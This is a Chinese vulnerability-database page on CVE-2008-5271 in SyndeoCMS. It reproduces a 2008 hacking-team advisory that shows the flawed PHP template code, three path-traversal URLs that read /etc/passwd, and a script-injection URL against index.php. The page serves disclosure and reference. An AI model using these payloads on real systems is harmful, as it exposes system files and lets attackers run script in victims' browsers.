SyndeoCMS 'index.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115389 漏洞类型 跨站脚本
发布时间 2008-06-10 更新时间 2008-12-01
CVE编号 CVE-2008-5271 CNNVD-ID CNNVD-200811-437
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5779
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-437
|漏洞详情
FredStuurmanSyndeoCMS的index.php中存在跨站脚本攻击漏洞。远程攻击者可以借助会话参数,注入任意web脚本或HTML。
|漏洞EXP
===========================================================
 SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us


#####################################################
 APPLICATION : SyndeoCMS
 VERSION     : 2.6.0 (Lastest Version)
 DOWNLOAD    : http://downloads.sourceforge.net/syndeocms
#####################################################

---LFI---

#################################################################
Vulnerable Code:
if (IsSet ($_GET['template']))
{
	$template_path = ...;
	$filename = $template_path . "/" . $_GET['template'];
	if (file_exists($filename))
	{
		$handle = fopen($filename, "r");
		$content = fread($handle, filesize($filename));
		fclose($handle);
	}
}
#################################################################

Vulnerable File: 

[+] starnet/editors/fckeditor/studenteditor.php
[+] starnet/modules/sn_news/edit_content.php
[+] starnet/modules/sn_newsletter/edit_content.php

Exploit:

[+] http://[target]/[path]/starnet/editors/fckeditor/studenteditor.php?template=../../../../../../../../../etc/passwd
[+] http://[target]/[path]/starnet/index.php?option=modulemanager&module=16&modoption=edit_article&cat_id=1&article_id=0&template=../../../../../../../../../../../../../etc/passwd
[+] http://[target]/[path]/starnet/index.php?option=modulemanager&module=17&modoption=edit_newsletter&newsletter_id=1&edition=1&template=../../../../../../../../../../../../../etc/passwd

Note:      - the first link requires pupil session (normal student session)
           - the second link and the third link require admin session


---XSS---

[+] index.php

Example:

http://[target]/[path]/index.php?page=1&section="><script>alert(111);</script>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

update:
see: http://www.syndeocms.org/forum/index.php?topic=1788.0

# milw0rm.com [2008-06-10]
|参考资料

来源:XF
名称:syndeocms-section-xss(42970)
链接:http://xforce.iss.net/xforce/xfdb/42970
来源:BID
名称:29644
链接:http://www.securityfocus.com/bid/29644
来源:SECUNIA
名称:30602
链接:http://secunia.com/advisories/30602
来源:MILW0RM
名称:5779
链接:http://milw0rm.com/exploits/5779